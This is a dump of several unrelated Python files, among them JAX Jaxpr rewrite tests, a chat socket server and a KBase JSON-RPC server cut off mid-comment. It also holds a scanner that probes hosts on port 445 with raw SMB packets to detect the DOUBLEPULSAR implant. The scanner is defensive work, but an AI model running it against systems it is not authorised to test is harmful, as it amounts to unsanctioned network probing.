# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@jax.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True
transforms=(('transpose',),) ] e g h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@jax.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] b e f
d = add a c
in (d, g, h, 0.00) }
length=2
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_vjp_call_jaxpr[
fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0
] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=2
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b g h
f = mul d e
in (*, b, i, j, *, f) }
length=2
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", jax.grad(g), [arg])
def test_remat_loop(self):
def f(k, x):
x = hcb.id_print(k + x)
return -k * x
def loss(k):
return lax.fori_loop(0, 1, jax.remat(f), k)
self.assertRewrite("""
{ lambda ; a c d.
let _ _ b e f =
while[ body_jaxpr={ lambda ; a b c f g.
let d = add a 1
e h i = remat_call[ call_jaxpr={ lambda ; a b g h.
let c = add a b
d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c g h
e = neg a
f = mul e d
in (f, i, j) }
concrete=False
name=f ] a c f g
in (d, b, e, h, i) }
body_nconsts=0
cond_jaxpr={ lambda ; a b c e f.
let d = lt a b
in (d,) }
cond_nconsts=0 ] 0 1 a c d
in (b, e, f) }""", loss, [2])
def test_named_call(self):
def tap_scalar(init, do_print=False):
@partial(jax.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2, dtype=np.int32))
self.assertRewrite("""
{ lambda a ; b d e.
let c = scan[ jaxpr={ lambda ; a b.
let c = named_call[ call_jaxpr={ lambda ; a b.
let c = add a b
in (c,) }
name=step ] a b
in (c,) }
length=2
linear=(False, False)
num_carry=1
num_consts=0
reverse=False
unroll=1 ] b a
in (c, d, e) }""", tap_scalar, [np.int32(3)])
def test_pmap(self):
def f(xv):
jax.pmap(lambda x: jnp.sin(hcb.id_print(x, tap_with_device=True)),
axis_name="i")(xv)
self.assertRewrite("""
{ lambda ; a b c.
let _ d e = xla_pmap[ axis_name=i
axis_size=1
backend=None
call_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = sin b
in (c, f, g) }
devices=None
donated_invars=(False, False, False)
global_arg_shapes=(None,)
global_axis_size=None
in_axes=(0, 0, 0)
name=<lambda>
out_axes=(0, 0, 0) ] a b c
in (d, e) }""", f, [np.array([2.], dtype=np.float32)])
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
detect_doublepulsar_smb.py
|
#!/usr/bin/python
import binascii
import socket
import argparse
import struct
import threading
# Packets
negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
# Arguments
parser = argparse.ArgumentParser(description="Detect present of DOUBLEPULSAR SMB implant\n\nAuthor: Luke Jennings\nWebsite: https://countercept.com\nTwitter: @countercept", formatter_class=argparse.RawTextHelpFormatter)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--ip', help='Single IP address to check')
group.add_argument('--file', help='File containing a list of IP addresses to check')
parser.add_argument('--timeout', help="Timeout on connection for socket in seconds", default=None)
parser.add_argument('--verbose', help="Verbose output for checking of commands", action='store_true')
parser.add_argument('--threads', help="Number of connection threads when checking file of IPs (default 10)", default="10")
args = parser.parse_args()
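# Example invocations (target values below are illustrative only), using the flags defined above:
#   python detect_doublepulsar_smb.py --ip 192.168.1.1 --timeout 2 --verbose
#   python detect_doublepulsar_smb.py --file targets.txt --threads 20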
ip = args.ip
filename = args.file
timeout = args.timeout
verbose = args.verbose
num_threads = int(args.threads)
semaphore = threading.BoundedSemaphore(value=num_threads)
print_lock = threading.Lock()
def print_status(ip, message):
global print_lock
with print_lock:
print "[*] [%s] %s" % (ip, message)
def check_ip(ip):
global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
# Connect to socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(float(timeout) if timeout else None)
host = ip
port = 445
s.connect((host, port))
# Send/receive negotiate protocol request
if verbose:
print_status(ip, "Sending negotiation protocol request")
s.send(negotiate_protocol_request)
s.recv(1024)
# Send/receive session setup request
if verbose:
print_status(ip, "Sending session setup request")
s.send(session_setup_request)
session_setup_response = s.recv(1024)
# Extract user ID from session setup response
user_id = session_setup_response[32:34]
if verbose:
print_status(ip, "User ID = %s" % struct.unpack("<H", user_id)[0])
# Replace user ID in tree connect request packet
modified_tree_connect_request = list(tree_connect_request)
modified_tree_connect_request[32] = user_id[0]
modified_tree_connect_request[33] = user_id[1]
modified_tree_connect_request = "".join(modified_tree_connect_request)
# Send tree connect request
if verbose:
print_status(ip, "Sending tree connect")
s.send(modified_tree_connect_request)
tree_connect_response = s.recv(1024)
# Extract tree ID from response
tree_id = tree_connect_response[28:30]
if verbose:
print_status(ip, "Tree ID = %s" % struct.unpack("<H", tree_id)[0])
# Replace tree ID and user ID in trans2 session setup packet
modified_trans2_session_setup = list(trans2_session_setup)
modified_trans2_session_setup[28] = tree_id[0]
modified_trans2_session_setup[29] = tree_id[1]
modified_trans2_session_setup[32] = user_id[0]
modified_trans2_session_setup[33] = user_id[1]
modified_trans2_session_setup = "".join(modified_trans2_session_setup)
# Send trans2 sessions setup request
if verbose:
print_status(ip, "Sending trans2 session setup")
s.send(modified_trans2_session_setup)
final_response = s.recv(1024)
s.close()
# Check for 0x51 response to indicate DOUBLEPULSAR infection
if final_response[34] == "\x51":
with print_lock:
print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!!" % ip
else:
with print_lock:
print "[-] [%s] No presence of DOUBLEPULSAR SMB implant" % ip
def threaded_check(ip_address):
global semaphore
try:
check_ip(ip_address)
except Exception as e:
with print_lock:
print "[ERROR] [%s] - %s" % (ip_address, e)
finally:
semaphore.release()
if ip:
check_ip(ip)
if filename:
with open(filename, "r") as fp:
for line in fp:
semaphore.acquire()
ip_address = line.strip()
t = threading.Thread(target=threaded_check, args=(ip_address,))
t.start()
|
server.py
|
import socket
import threading  # threading is essential for handling multiple client connections
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
FORMAT= 'utf-8'
DISCONNECT_MSG = "!DISCONNECT"
#SERVER = "10.252.1.144"
# print("SERVER CODE: ", socket.gethostname())
ADDR = (SERVER, PORT)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind the socket to the address
server.bind(ADDR)
def handle_client(conn, addr):
print(f"=> NEW CONNECTIONS {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if not msg_length: break  # client closed the connection without sending a header
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MSG:
connected = False
print(f"{addr} Says : {msg}")
def start():
server.listen()
print(f"=> Finding for new Connection with {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()  # handle each client in its own thread
print(f"=> ACTIVE CONNECTIONS {threading.activeCount() - 1 }")
print("=> INITATING SERVER")
start()
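# A minimal companion client sketch for the length-prefixed protocol above (not part
# of server.py; shown here for illustration). It sends a HEADER-byte ASCII length
# field padded with spaces, then the UTF-8 message, and finally the disconnect message:
#
#   import socket
#
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect((socket.gethostbyname(socket.gethostname()), 5050))
#
#   def send(msg):
#       data = msg.encode('utf-8')
#       length = str(len(data)).encode('utf-8')
#       length += b' ' * (64 - len(length))  # pad the length field to HEADER (64) bytes
#       client.send(length)
#       client.send(data)
#
#   send("Hello, server")
#   send("!DISCONNECT")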
|
KBParallelTestModuleServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from KBParallelTestModule.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'KBParallelTestModule'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from KBParallelTestModule.KBParallelTestModuleImpl import KBParallelTestModule # noqa @IgnorePep8
impl_KBParallelTestModule = KBParallelTestModule(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
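# For example (illustrative): json.dumps({"ids": set([1, 2])}, cls=JSONObjectEncoder)
# yields '{"ids": [1, 2]}', since sets and frozensets are converted to lists above.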
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'KBParallelTestModule'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_KBParallelTestModule.do_something,
name='KBParallelTestModule.do_something',
types=[dict])
self.method_authentication['KBParallelTestModule.do_something'] = 'required' # noqa
self.rpc_service.add(impl_KBParallelTestModule.status,
name='KBParallelTestModule.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'KBParallelTestModule ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded python BaseHTTP service
# listening on port 9999 by default, execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, the server is started on localhost on a system-assigned port
    in the main thread. Execution of the main thread stays in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    also allows the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
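# Usage sketch (illustrative; not part of the generated service code): run the
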